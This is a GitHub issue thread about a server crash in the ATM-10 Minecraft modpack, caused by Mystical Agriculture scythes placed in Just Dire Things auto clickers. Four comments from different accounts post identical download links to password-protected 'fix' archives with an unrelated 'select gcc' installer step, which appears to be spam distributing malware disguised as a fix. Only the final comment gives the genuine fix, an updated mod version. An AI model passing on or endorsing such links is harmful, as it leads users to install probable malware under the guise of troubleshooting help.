### ISSUE TITLE
[Crash]: Mystical Agriculture + Just Dire Thinks - Item : All Scythe from Mystical

### ISSUE THREAD

**Issue by bomber1992** [AllTheMods/ATM-10#337]
### Possible Fixes

No

### Modpack Version

0.38

### What happened?

As soon as you put a Scythe from Mystical in an Auto Clicker from Just Dire Thinks the server immediately crashes!

### Crash Log

https://gist.github.com/bomber1992/bfb660bd3e8f6ef02ee550d5e2962a47

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by xiaobai-marker** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by CosionMa** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Aadya1603** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by alekthefirst** [comment]
Was an issue with items that was supposed to be unbreakable
Fixed in Mystical Agriculture 8.0.4, released with ATM10 0.39
